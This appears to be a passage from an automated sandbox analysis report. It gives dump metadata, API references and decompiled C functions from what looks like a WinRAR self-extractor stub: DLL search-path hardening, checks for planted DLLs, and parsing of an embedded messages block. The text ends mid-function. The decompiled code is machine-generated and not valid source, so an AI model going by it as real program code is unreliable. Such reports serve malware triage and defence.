          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: H_prologItemTextWindow
          • String ID: "%s"%s$,>"$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
          • API String ID: 810644672-564354363
          • Opcode ID: b4fcaf916e731667e0efa78a0e045037b60ed4f4edf6b670037ef93f5496a710
          • Instruction ID: dccaccb08fa1c5869625d891496bf87182ec7875511d3c6970fa1cb5c7a22d4a
          • Opcode Fuzzy Hash: b4fcaf916e731667e0efa78a0e045037b60ed4f4edf6b670037ef93f5496a710
          • Instruction Fuzzy Hash: 4242E5B1954309BAEB359FA0AC8DFFE3768AB16700F844055FA01A60E3C7B54D65CF62
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 76%
          			E001FFD49(void* __edx, char _a3, long _a4, CHAR* _a8, CHAR* _a12, CHAR* _a16, CHAR* _a20, CHAR* _a24, CHAR* _a28, CHAR* _a32, CHAR* _a36, CHAR* _a40, CHAR* _a44, CHAR* _a48, CHAR* _a52, CHAR* _a56, CHAR* _a60, CHAR* _a64, CHAR* _a68, CHAR* _a72, CHAR* _a76, CHAR* _a80, CHAR* _a84, CHAR* _a88, CHAR* _a92, CHAR* _a96, CHAR* _a100, CHAR* _a104, CHAR* _a108, CHAR* _a112, CHAR* _a116, CHAR* _a120, CHAR* _a124, CHAR* _a128, CHAR* _a132, CHAR* _a136, CHAR* _a140, CHAR* _a144, CHAR* _a148, CHAR* _a152, CHAR* _a156, CHAR* _a160, CHAR* _a164, CHAR* _a168, CHAR* _a172, CHAR* _a176, CHAR* _a180, CHAR* _a184, CHAR* _a188, CHAR* _a192, CHAR* _a196, CHAR* _a200, CHAR* _a204, CHAR* _a208, CHAR* _a212, CHAR* _a216, CHAR* _a220, CHAR* _a224, CHAR* _a228, CHAR* _a232, CHAR* _a236, CHAR* _a240, CHAR* _a244, char _a248, char _a252, short _a756, short _a760, char _a768, short _a772, char _a4848, char _a4852, void _a4860, char _a4864, short _a4868, char _a9152, char _a9160, void _a13260, signed char _a46032) {
          				char _v1;
          				long _v4;
          				char* _t118;
          				void* _t126;
          				int _t130;
          				long _t141;
          				int _t167;
          				_Unknown_base(*)()* _t176;
          				_Unknown_base(*)()* _t177;
          				signed char _t184;
          				struct _SECURITY_ATTRIBUTES* _t195;
          				long _t197;
          				void* _t198;
          				struct HINSTANCE__* _t201;
          				signed int _t203;
          				signed int _t205;
          				void* _t206;
          				signed int _t207;
          				int _t208;
          				void* _t210;
          
          				E0020D940();
          				_push(_t207);
          				_a3 = 0;
          				_t201 = GetModuleHandleW(L"kernel32");
          				if(_t201 == 0) {
          					L5:
          					_t118 =  *0x22d080; // 0x222884
          					_t208 = _t207 | 0xffffffff;
          					_t202 = 0x800;
          					_a8 = L"version.dll";
          					_a12 = L"DXGIDebug.dll";
          					_a16 = L"sfc_os.dll";
          					_a20 = L"SSPICLI.DLL";
          					_a24 = L"rsaenh.dll";
          					_a28 = L"UXTheme.dll";
          					_a32 = L"dwmapi.dll";
          					_a36 = L"cryptbase.dll";
          					_a40 = L"lpk.dll";
          					_a44 = L"usp10.dll";
          					_a48 = L"clbcatq.dll";
          					_a52 = L"comres.dll";
          					_a56 = L"ws2_32.dll";
          					_a60 = L"ws2help.dll";
          					_a64 = L"psapi.dll";
          					_a68 = L"ieframe.dll";
          					_a72 = L"ntshrui.dll";
          					_a76 = L"atl.dll";
          					_a80 = L"setupapi.dll";
          					_a84 = L"apphelp.dll";
          					_a88 = L"userenv.dll";
          					_a92 = L"netapi32.dll";
          					_a96 = L"shdocvw.dll";
          					_a100 = L"crypt32.dll";
          					_a104 = L"msasn1.dll";
          					_a108 = L"cryptui.dll";
          					_a112 = L"wintrust.dll";
          					_a116 = L"shell32.dll";
          					_a120 = L"secur32.dll";
          					_a124 = L"cabinet.dll";
          					_a128 = L"oleaccrc.dll";
          					_a132 = L"ntmarta.dll";
          					_a136 = L"profapi.dll";
          					_a140 = L"WindowsCodecs.dll";
          					_a144 = L"srvcli.dll";
          					_a148 = L"cscapi.dll";
          					_a152 = L"slc.dll";
          					_a156 = L"imageres.dll";
          					_a160 = L"dnsapi.DLL";
          					_a164 = L"iphlpapi.DLL";
          					_a168 = L"WINNSI.DLL";
          					_a172 = L"netutils.dll";
          					_a176 = L"mpr.dll";
          					_a180 = L"devrtl.dll";
          					_a184 = L"propsys.dll";
          					_a188 = L"mlang.dll";
          					_a192 = L"samcli.dll";
          					_a196 = L"samlib.dll";
          					_a200 = L"wkscli.dll";
          					_a204 = L"dfscli.dll";
          					_a208 = L"browcli.dll";
          					_a212 = L"rasadhlp.dll";
          					_a216 = L"dhcpcsvc6.dll";
          					_a220 = L"dhcpcsvc.dll";
          					_a224 = L"XmlLite.dll";
          					_a228 = L"linkinfo.dll";
          					_a232 = L"cryptsp.dll";
          					_a236 = L"RpcRtRemote.dll";
          					_a240 = L"aclui.dll";
          					_a244 = L"dsrole.dll";
          					_a248 = L"peerdist.dll";
          					if( *_t118 == 0x78) {
          						L14:
          						GetModuleFileNameW(0,  &_a772, _t202);
          						E001FFAB1( &_a9160, E001FB943(_t223,  &_a772), _t202);
          						_t195 = 0;
          						_t203 = 0;
          						do {
          							if(E001FA995() < 0x600) {
          								_t126 = 0;
          								__eflags = 0;
          							} else {
          								_t126 = E001FFCFD( *((intOrPtr*)(_t210 + 0x18 + _t203 * 4))); // executed
          							}
          							if(_t126 == 0) {
          								L20:
          								_push(0x800);
          								E001FB9B9(_t227,  &_a772,  *((intOrPtr*)(_t210 + 0x1c + _t203 * 4)));
          								_t130 = GetFileAttributesW( &_a760); // executed
          								if(_t130 != _t208) {
          									_t195 =  *((intOrPtr*)(_t210 + 0x18 + _t203 * 4));
          									L24:
          									if(_v1 != 0) {
          										L30:
          										_t234 = _t195;
          										if(_t195 == 0) {
          											return _t130;
          										}
          										E001FB98D(_t234,  &_a768);
          										if(E001FA995() < 0x600) {
          											_push( &_a9160);
          											_push( &_a768);
          											E001F3E41( &_a4864, 0x864, L"Please remove %s from %s folder. It is unsecure to run %s until it is done.", _t195);
          											_t210 = _t210 + 0x18;
          											_t130 = AllocConsole();
          											__eflags = _t130;
          											if(_t130 != 0) {
          												__imp__AttachConsole(GetCurrentProcessId());
          												_t141 = E00212B33( &_a4860);
          												WriteConsoleW(GetStdHandle(0xfffffff4),  &_a4860, _t141,  &_v4, 0);
          												Sleep(0x2710);
          												_t130 = FreeConsole();
          											}
          										} else {
          											E001FFCFD(L"dwmapi.dll");
          											E001FFCFD(L"uxtheme.dll");
          											_push( &_a9152);
          											_push( &_a760);
          											E001F3E41( &_a4852, 0x864, E001FDA42(_t185, 0xf1), _t195);
          											_t210 = _t210 + 0x18;
          											_t130 = E00209735(0,  &_a4848, E001FDA42(_t185, 0xf0), 0x30);
          										}
          										ExitProcess(0);
          									}
          									_t205 = 0;
          									while(1) {
          										_push(0x800);
          										E001FB9B9(0,  &_a768,  *((intOrPtr*)(_t210 + 0x3c + _t205 * 4)));
          										_t130 = GetFileAttributesW( &_a756);
          										if(_t130 != _t208) {
          											break;
          										}
          										_t205 = _t205 + 1;
          										if(_t205 < 0x35) {
          											continue;
          										}
          										goto L30;
          									}
          									_t195 =  *((intOrPtr*)(_t210 + 0x38 + _t205 * 4));
          									goto L30;
          								}
          							} else {
          								_t86 = _t203 * 4; // 0x222920
          								_t130 = CompareStringW(0x400, 0x1001,  *(_t210 + _t86 + 0x24), _t208, L"DXGIDebug.dll", _t208); // executed
          								_t227 = _t130 - 2;
          								if(_t130 != 2) {
          									goto L21;
          								}
          								goto L20;
          							}
          							L21:
          							_t203 = _t203 + 1;
          						} while (_t203 < 8);
          						goto L24;
          					}
          					_t197 = E00216662(_t185, _t118);
          					_pop(_t185);
          					if(_t197 == 0) {
          						goto L14;
          					}
          					GetModuleFileNameW(0,  &_a4868, 0x800);
          					_t206 = CreateFileW( &_a4868, 0x80000000, 1, 0, 3, 0, 0);
          					if(_t206 == _t208 || SetFilePointer(_t206, _t197, 0, 0) != _t197) {
          						L13:
          						CloseHandle(_t206);
          						_t202 = 0x800;
          						goto L14;
          					} else {
          						_t167 = ReadFile(_t206,  &_a13260, 0x7ffe,  &_a4, 0);
          						_t222 = _t167;
          						if(_t167 == 0) {
          							goto L13;
          						}
          						_t185 = 0;
          						_push(0x104);
          						 *((short*)(_t210 + 0x33e0 + (_a4 >> 1) * 2)) = 0;
          						_push( &_a252);
          						_push( &_a13260);
          						while(1) {
          							_t198 = E001FF835(_t222);
          							_t223 = _t198;
          							if(_t198 == 0) {
          								goto L13;
          							}
          							E001FFCFD( &_a252);
          							_push(0x104);
          							_push( &_a248);
          							_push(_t198);
          						}
          						goto L13;
          					}
          				}
          				_t176 = GetProcAddress(_t201, "SetDllDirectoryW");
          				_t184 = _a46032;
          				if(_t176 != 0) {
          					asm("sbb ecx, ecx");
          					_t185 =  ~(_t184 & 0x000000ff) & 0x002222e4;
          					 *_t176( ~(_t184 & 0x000000ff) & 0x002222e4);
          				}
          				_t177 = GetProcAddress(_t201, "SetDefaultDllDirectories");
          				if(_t177 != 0) {
          					_t185 = ((_t184 == 0x00000000) - 0x00000001 & 0xfffff800) + 0x1000;
          					 *_t177(((_t184 == 0x00000000) - 0x00000001 & 0xfffff800) + 0x1000);
          					_v1 = 1;
          				}
          				goto L5;
          			}

          APIs
          • GetModuleHandleW.KERNEL32 ref: 001FFD61
          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 001FFD79
          • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 001FFD9C
          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00200047
          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0020005F
          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00200071
          • ReadFile.KERNEL32(00000000,?,00007FFE,002228D4,00000000), ref: 00200090
          • CloseHandle.KERNEL32(00000000), ref: 002000E8
          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 002000FE
          • CompareStringW.KERNELBASE(00000400,00001001, )",?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00200158
          • GetFileAttributesW.KERNELBASE(?,?,002228EC,00000800,?,00000000,?,00000800), ref: 00200181
          • GetFileAttributesW.KERNEL32(?,?,002229AC,00000800), ref: 002001BA
            • Part of subcall function 001FFCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001FFD18
            • Part of subcall function 001FFCFD: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,001FE7F6,Crypt32.dll,?,001FE878,?,001FE85C,?,?,?,?), ref: 001FFD3A
          • _swprintf.LIBCMT ref: 0020022A
          • _swprintf.LIBCMT ref: 00200276
            • Part of subcall function 001F3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001F3E54
          • AllocConsole.KERNEL32 ref: 0020027E
          • GetCurrentProcessId.KERNEL32 ref: 00200288
          • AttachConsole.KERNEL32(00000000), ref: 0020028F
          • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 002002B5
          • WriteConsoleW.KERNEL32(00000000), ref: 002002BC
          • Sleep.KERNEL32(00002710), ref: 002002C7
          • FreeConsole.KERNEL32 ref: 002002CD
          • ExitProcess.KERNEL32 ref: 002002D5
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
          • String ID: )"$ *"$$+"$(,"$(-"$(."$4*"$8)"$<+"$@,"$@-"$@."$DXGIDebug.dll$L*"$P)"$P,"$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$X+"$X-"$`."$d*"$dwmapi.dll$h)"$kernel32$l,"$p+"$p-"$t*"$t."$uxtheme.dll$("$+"$,"
          • API String ID: 1201351596-3425416704
          • Opcode ID: 0501cc1bade7a6f88494b20e5de275c3a585d140fcb5947fcbb5bd2a837bd7fc
          • Instruction ID: 08a104057a9c36357c5965aa2a7db4a3092a699c856dc029496b55add0be6132
          • Opcode Fuzzy Hash: 0501cc1bade7a6f88494b20e5de275c3a585d140fcb5947fcbb5bd2a837bd7fc
          • Instruction Fuzzy Hash: C3D191B1028395FAD331DF90E848B9FB7E8BF85704F50091DF68896191CBB2865DCB62
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 89%
          			E001FCFD0(signed int __ecx, void* __edx) {
          				void* __ebx;
          				void* __edi;
          				void* __esi;
          				void* __ebp;
          				signed int _t196;
          				void* _t197;
          				WCHAR* _t198;
          				void* _t203;
          				signed int _t212;
          				signed int _t215;
          				signed int _t218;
          				signed int _t228;
          				void* _t229;
          				void* _t232;
          				signed int _t235;
          				signed int _t237;
          				signed int _t238;
          				signed int _t239;
          				signed int _t244;
          				signed int _t248;
          				signed int _t262;
          				signed int _t267;
          				signed int _t268;
          				signed int _t270;
          				signed int _t271;
          				signed int _t272;
          				signed int _t273;
          				void* _t274;
          				signed int _t279;
          				char* _t280;
          				signed int _t284;
          				short _t287;
          				void* _t288;
          				signed int _t294;
          				signed int _t299;
          				void* _t302;
          				void* _t304;
          				void* _t307;
          				signed int _t316;
          				signed int _t318;
          				unsigned int _t328;
          				signed int _t330;
          				unsigned int _t333;
          				signed int _t336;
          				void* _t343;
          				signed int _t348;
          				signed int _t351;
          				signed int _t352;
          				signed int _t357;
          				signed int _t361;
          				void* _t370;
          				signed int _t372;
          				signed int _t373;
          				void* _t374;
          				void* _t375;
          				intOrPtr* _t376;
          				signed int _t377;
          				signed int _t380;
          				signed int _t381;
          				signed int _t382;
          				signed int _t383;
          				signed int _t384;
          				signed int _t387;
          				signed int _t389;
          				signed int* _t390;
          				void* _t391;
          				void* _t392;
          				void* _t394;
          				void* _t398;
          				void* _t399;
          
          				_t370 = __edx;
          				_t318 = __ecx;
          				_t392 = _t391 - 0x6c;
          				E0020D870(E002213DF, _t390);
          				E0020D940();
          				_t196 = 0x5c;
          				_push(0x427c);
          				_push(_t390[0x1e]);
          				_t387 = _t318;
          				_t390[0x11] = _t196;
          				_t390[0x12] = _t387;
          				_t197 = E00210BB8(_t318);
          				_t316 = 0;
          				_t396 = _t197;
          				_t198 = _t390 - 0x1264;
          				if(_t197 != 0) {
          					E001FFAB1(_t198, _t390[0x1e], 0x800);
          				} else {
          					GetModuleFileNameW(0, _t198, 0x800);
          					 *((short*)(E001FB943(_t396, _t390 - 0x1264))) = 0;
          					E001FFA89(_t396, _t390 - 0x1264, _t390[0x1e], 0x800);
          				}
          				E001F943C(_t390 - 0x2288);
          				_push(4);
          				 *(_t390 - 4) = _t316;
          				_push(_t390 - 0x1264);
          				if(E001F9768(_t390 - 0x2288, _t387) == 0) {
          					L57:
          					_t203 = E001F946E(_t390 - 0x2288); // executed
          					 *[fs:0x0] =  *((intOrPtr*)(_t390 - 0xc));
          					return _t203;
          				} else {
          					_t380 = _t316;
          					_t398 =  *0x22d5f4 - _t380; // 0x63
          					if(_t398 <= 0) {
          						L7:
          						E00215030(_t316, _t380, _t387,  *_t387,  *((intOrPtr*)(_t387 + 4)), 4, E001FCC62);
          						E00215030(_t316, _t380, _t387,  *((intOrPtr*)(_t387 + 0x14)),  *((intOrPtr*)(_t387 + 0x18)), 4, E001FCBC7);
          						_t394 = _t392 + 0x20;
          						_t390[0x1e] = _t316;
          						_t381 = _t380 | 0xffffffff;
          						_t390[0x16] = _t316;
          						_t390[0x19] = _t381;
          						while(_t381 == 0xffffffff) {
          							_t390[0x1b] = E001F9B57();
          							_t294 = E001F9979(_t370, _t390 - 0x4288, 0x2000);
          							_t390[0x17] = _t294;
          							_t384 = _t316;
          							_t25 = _t294 - 0x10; // -16
          							_t361 = _t25;
          							_t390[0x15] = _t361;
          							if(_t361 < 0) {
          								L25:
          								_t295 = _t390[0x1b];
          								_t381 = _t390[0x19];
          								L26:
          								E001F9A4C(_t390 - 0x2288, _t390, _t295 + _t390[0x17] + 0xfffffff0, _t316, _t316);
          								_t299 = _t390[0x16] + 1;
          								_t390[0x16] = _t299;
          								__eflags = _t299 - 0x100;
          								if(_t299 < 0x100) {
          									continue;
          								}
          								__eflags = _t381 - 0xffffffff;
          								if(_t381 == 0xffffffff) {
          									goto L57;
          								}
          								break;
          							}
          							L10:
          							while(1) {
          								if( *((char*)(_t390 + _t384 - 0x4288)) != 0x2a ||  *((char*)(_t390 + _t384 - 0x4287)) != 0x2a) {
          									L14:
          									_t370 = 0x2a;
          									if( *((intOrPtr*)(_t390 + _t384 - 0x4288)) != _t370) {
          										L18:
          										if( *((char*)(_t390 + _t384 - 0x4288)) != 0x52 ||  *((char*)(_t390 + _t384 - 0x4287)) != 0x61) {
          											L21:
          											_t384 = _t384 + 1;
          											if(_t384 > _t390[0x15]) {
          												goto L25;
          											}
          											_t294 = _t390[0x17];
          											continue;
          										} else {
          											_t302 = E00215460(_t390 - 0x4286 + _t384, 0x22261c, 4);
          											_t394 = _t394 + 0xc;
          											if(_t302 == 0) {
          												goto L57;
          											}
          											goto L21;
          										}
          									}
          									_t366 = _t390 - 0x4284 + _t384;
          									if( *((intOrPtr*)(_t390 - 0x4284 + _t384 - 2)) == _t370 && _t384 <= _t294 + 0xffffffe0) {
          										_t304 = E00214DA0(_t366, L"*messages***", 0xb);
          										_t394 = _t394 + 0xc;
          										if(_t304 == 0) {
          											_t390[0x1e] = 1;
          											goto L24;
          										}
          									}
          									goto L18;
          								} else {
          									_t307 = E00215460(_t390 - 0x4286 + _t384, "*messages***", 0xb);
          									_t394 = _t394 + 0xc;
          									if(_t307 == 0) {
          										L24:
          										_t295 = _t390[0x1b];
          										_t381 = _t384 + _t390[0x1b];
          										_t390[0x19] = _t381;
          										goto L26;
          									}
          									_t294 = _t390[0x17];
          									goto L14;
          								}
          							}
          						}
          						asm("cdq");
          						E001F9A4C(_t390 - 0x2288, _t390, _t381, _t370, _t316);
          						_push(0x200002);
          						_t382 = E00212B53(_t390 - 0x2288);
          						_t390[0x1a] = _t382;
          						__eflags = _t382;
          						if(_t382 == 0) {
          							goto L57;
          						}
          						_t328 = E001F9979(_t370, _t382, "@."");
          						_t390[0x19] = _t328;
          						__eflags = _t390[0x1e];
          						if(_t390[0x1e] == 0) {
          							_push(2 + _t328 * 2);
          							_t212 = E00212B53(_t328);
          							_t390[0x1e] = _t212;
          							__eflags = _t212;
          							if(_t212 == 0) {
          								goto L57;
          							}
          							_t330 = _t390[0x19];
          							 *(_t330 + _t382) = _t316;
          							__eflags = _t330 + 1;
          							E00200FDE(_t382, _t212, _t330 + 1);
          							L00212B4E(_t382);
          							_t382 = _t390[0x1e];
          							_t333 = _t390[0x19];
          							_t390[0x1a] = _t382;
          							L33:
          							_t215 = 0x100000;
          							__eflags = _t333 - 0x100000;
          							if(_t333 <= 0x100000) {
          								_t215 = _t333;
          							}
          							 *((short*)(_t382 + _t215 * 2)) = 0;
          							E001FFA56(_t390 - 0xd4, 0x222624, 0x64);
          							_push(0x20002);
          							_t218 = E00212B53(0);
          							_t390[0x1b] = _t218;
          							__eflags = _t218;
          							if(_t218 != 0) {
          								__eflags = _t390[0x19];
          								_t336 = _t316;
          								_t371 = _t316;
          								_t390[0x1e] = _t336;
          								 *_t390 = _t316;
          								_t383 = _t316;
          								_t390[0x17] = _t316;
          								if(_t390[0x19] <= 0) {
          									L54:
          									E001FCB33(_t387, _t371, _t390, _t218, _t336);
          									L00212B4E(_t390[0x1a]);
          									L00212B4E(_t390[0x1b]);
          									__eflags =  *((intOrPtr*)(_t387 + 0x2c)) - _t316;
          									if( *((intOrPtr*)(_t387 + 0x2c)) <= _t316) {
          										L56:
          										 *0x230124 =  *((intOrPtr*)(_t387 + 0x28));
          										E00215030(_t316, _t383, _t387,  *((intOrPtr*)(_t387 + 0x3c)),  *((intOrPtr*)(_t387 + 0x40)), 4, E001FCD08);
          										E00215030(_t316, _t383, _t387,  *((intOrPtr*)(_t387 + 0x50)),  *((intOrPtr*)(_t387 + 0x54)), 4, E001FCD37);
          										goto L57;
          									} else {
          										goto L55;
          									}
          									do {
          										L55:
          										E00203393(_t387 + 0x3c, _t371, _t316);
          										E00203393(_t387 + 0x50, _t371, _t316);
          										_t316 = _t316 + 1;
          										__eflags = _t316 -  *((intOrPtr*)(_t387 + 0x2c));
          									} while (_t316 <  *((intOrPtr*)(_t387 + 0x2c)));
          									goto L56;
          								}
          								_t390[0x14] = 0xd;
          								_t390[0x13] = 0xa;
          								_t390[0x15] = 9;
          								do {
          									_t228 = _t390[0x1a];
          									__eflags = _t383;
          									if(_t383 == 0) {
          										L80:
          										_t372 =  *(_t228 + _t383 * 2) & 0x0000ffff;
          										_t383 = _t383 + 1;
          										__eflags = _t372;
          										if(_t372 == 0) {
          											break;
          										}
          										__eflags = _t372 - _t390[0x11];
          										if(_t372 != _t390[0x11]) {
          											_t229 = 0xd;
          											__eflags = _t372 - _t229;
          											if(_t372 == _t229) {
          												L99:
          												E001FCB33(_t387, _t390[0x17], _t390, _t390[0x1b], _t336);
          												 *_t390 = _t316;
          												_t336 = _t316;
          												_t390[0x17] = _t316;
          												L98:
          												_t390[0x1e] = _t336;
          												goto L52;
          											}
          											_t232 = 0xa;
          											__eflags = _t372 - _t232;
          											if(_t372 == _t232) {
          												goto L99;
          											}
          											L96:
          											__eflags = _t336 - 0x10000;
          											if(_t336 >= 0x10000) {
          												goto L52;
          											}
          											 *(_t390[0x1b] + _t336 * 2) = _t372;
          											_t336 = _t336 + 1;
          											__eflags = _t336;
          											goto L98;
          										}
          										__eflags = _t336 - 0x10000;
          										if(_t336 >= 0x10000) {
          											goto L52;
          										}
          										_t235 = ( *(_t228 + _t383 * 2) & 0x0000ffff) - 0x22;
          										__eflags = _t235;
          										if(_t235 == 0) {
          											_push(0x22);
          											L93:
          											_pop(_t377);
          											 *(_t390[0x1b] + _t336 * 2) = _t377;
          											_t336 = _t336 + 1;
          											_t390[0x1e] = _t336;
          											_t383 = _t383 + 1;
          											goto L52;
          										}
          										_t237 = _t235 - 0x3a;
          										__eflags = _t237;
          										if(_t237 == 0) {
          											_push(0x5c);
          											goto L93;
          										}
          										_t238 = _t237 - 0x12;
          										__eflags = _t238;
          										if(_t238 == 0) {
          											_push(0xa);
          											goto L93;
          										}
          										_t239 = _t238 - 4;
          										__eflags = _t239;
          										if(_t239 == 0) {
          											_push(0xd);
          											goto L93;
          										}
          										__eflags = _t239 != 0;
          										if(_t239 != 0) {
          											goto L96;
          										}
          										_push(9);
          										goto L93;
          									}
          									_t373 =  *(_t228 + _t383 * 2 - 2) & 0x0000ffff;
          									__eflags = _t373 - _t390[0x14];
          									if(_t373 == _t390[0x14]) {
          										L42:
          										_t343 = 0x3a;
          										__eflags =  *(_t228 + _t383 * 2) - _t343;
          										if( *(_t228 + _t383 * 2) != _t343) {
          											L71:
          											_t390[0x18] = _t228 + _t383 * 2;
          											_t244 = E001FF91A( *(_t228 + _t383 * 2) & 0x0000ffff);
          											__eflags = _t244;
          											if(_t244 == 0) {
          												L79:
          												_t336 = _t390[0x1e];
          												_t228 = _t390[0x1a];
          												goto L80;
          											}
          											E001FFAB1(_t390 - 0x264, _t390[0x18], 0x64);
          											_t248 = E00214E1D(_t390 - 0x264, L" \t,");
          											_t390[0x18] = _t248;
          											__eflags = _t248;
          											if(_t248 == 0) {
          												goto L79;
          											}
          											 *_t248 = 0;
          											E002011FA(_t390 - 0x264, _t390 - 0x138, 0x64);
          											E001FFA56(_t390 - 0x70, _t390 - 0xd4, 0x64);
          											E001FFA2F(__eflags, _t390 - 0x70, _t390 - 0x138, 0x64);
          											E001FFA56(_t390, _t390 - 0x70, 0x32);
          											_t262 = E00214E71(_t316, 0, _t383, _t387, _t390 - 0x70,  *_t387,  *((intOrPtr*)(_t387 + 4)), 4, E001FCCED);
          											_t394 = _t394 + 0x14;
          											__eflags = _t262;
          											if(_t262 != 0) {
          												_t268 =  *_t262 * 0xc;
          												__eflags = _t268;
          												_t167 = _t268 + 0x22d150; // 0x28b64ee0
          												_t390[0x17] =  *_t167;
          											}
          											_t383 = _t383 + (_t390[0x18] - _t390 - 0x264 >> 1) + 1;
          											__eflags = _t383;
          											_t267 = _t390[0x1a];
          											_t374 = 0x20;
          											while(1) {
          												_t348 =  *(_t267 + _t383 * 2) & 0x0000ffff;
          												__eflags = _t348 - _t374;
          												if(_t348 == _t374) {
          													goto L78;
          												}
          												L77:
          												_t174 =  &(_t390[0x15]); // 0x9
          												__eflags = _t348 -  *_t174;
          												if(_t348 !=  *_t174) {
          													L51:
          													_t336 = _t390[0x1e];
          													goto L52;
          												}
          												L78:
          												_t383 = _t383 + 1;
          												_t348 =  *(_t267 + _t383 * 2) & 0x0000ffff;
          												__eflags = _t348 - _t374;
          												if(_t348 == _t374) {
          													goto L78;
          												}
          												goto L77;
          											}
          										}
          										_t389 = _t390[0x1a];
          										_t270 = _t228 | 0xffffffff;
          										__eflags = _t270;
          										_t390[0x16] = _t270;
          										_t390[0xd] = L"STRINGS";
          										_t390[0xe] = L"DIALOG";
          										_t390[0xf] = L"MENU";
          										_t390[0x10] = L"DIRECTION";
          										_t390[0x18] = _t316;
          										do {
          											_t93 = _t316 * 4; // 0x222628
          											_t271 = E00212B33( *((intOrPtr*)(_t390 + _t93 + 0x34)));
          											_t96 = _t316 * 4; // 0x222628
          											_t390[0x18] = _t271;
          											_t272 = E00214DA0(_t389 + 2 + _t383 * 2,  *((intOrPtr*)(_t390 + _t96 + 0x34)), _t271);
          											_t394 = _t394 + 0x10;
          											_t375 = 0x20;
          											__eflags = _t272;
          											if(_t272 != 0) {
          												L47:
          												_t273 = _t390[0x16];
          												goto L48;
          											}
          											_t357 = _t390[0x18] + _t383;
          											__eflags =  *((intOrPtr*)(_t389 + 2 + _t357 * 2)) - _t375;
          											if( *((intOrPtr*)(_t389 + 2 + _t357 * 2)) > _t375) {
          												goto L47;
          											}
          											_t273 = _t316;
          											_t383 = _t357 + 1;
          											_t390[0x16] = _t273;
          											L48:
          											_t316 = _t316 + 1;
          											__eflags = _t316 - 4;
          										} while (_t316 < 4);
          										_t387 = _t390[0x12];
          										_t316 = 0;
          										__eflags = _t273;
          										if(__eflags != 0) {
          											_t228 = _t390[0x1a];
          											if(__eflags <= 0) {
          												goto L71;
          											} else {
          												goto L59;
          											}
          											while(1) {
          												L59:
          												_t351 =  *(_t228 + _t383 * 2) & 0x0000ffff;
          												__eflags = _t351 - _t375;
          												if(_t351 == _t375) {
          													goto L61;
          												}
          												L60:
          												__eflags = _t351 - _t390[0x15];
          												if(_t351 != _t390[0x15]) {
          													_t376 = _t228 + _t383 * 2;
          													_t390[0x18] = _t316;
          													_t274 = 0x20;
          													_t352 = _t316;
          													__eflags =  *_t376 - _t274;
          													if( *_t376 <= _t274) {
          														L66:
          														 *((short*)(_t390 + _t352 * 2 - 0x19c)) = 0;
          														E002011FA(_t390 - 0x19c, _t390 - 0x70, 0x64);
          														_t383 = _t383 + _t390[0x18];
          														_t279 = _t390[0x16];
          														__eflags = _t279 - 3;
          														if(_t279 != 3) {
          															__eflags = _t279 - 1;
          															_t280 = "$%s:";
          															if(_t279 != 1) {
          																_t280 = "@%s:";
          															}
          															E001FD9DC(_t390 - 0xd4, 0x64, _t280, _t390 - 0x70);
          															_t394 = _t394 + 0x10;
          														} else {
          															_t284 = E00212B69(_t390 - 0x19c, _t390 - 0x19c, L"RTL");
          															asm("sbb al, al");
          															 *((char*)(_t387 + 0x64)) =  ~_t284 + 1;
          														}
          														goto L51;
          													} else {
          														goto L63;
          													}
          													while(1) {
          														L63:
          														__eflags = _t352 - 0x63;
          														if(_t352 >= 0x63) {
          															break;
          														}
          														_t287 =  *_t376;
          														_t376 = _t376 + 2;
          														 *((short*)(_t390 + _t352 * 2 - 0x19c)) = _t287;
          														_t352 = _t352 + 1;
          														_t288 = 0x20;
          														__eflags =  *_t376 - _t288;
          														if( *_t376 > _t288) {
          															continue;
          														}
          														break;
          													}
          													_t390[0x18] = _t352;
          													goto L66;
          												}
          												L61:
          												_t383 = _t383 + 1;
          												L59:
          												_t351 =  *(_t228 + _t383 * 2) & 0x0000ffff;
          												__eflags = _t351 - _t375;
          												if(_t351 == _t375) {
          													goto L61;
          												}
          												goto L60;
          											}
          										}
          										E001FFA56(_t390 - 0xd4, 0x222624, 0x64);
          										goto L51;
          									}
          									__eflags = _t373 - _t390[0x13];
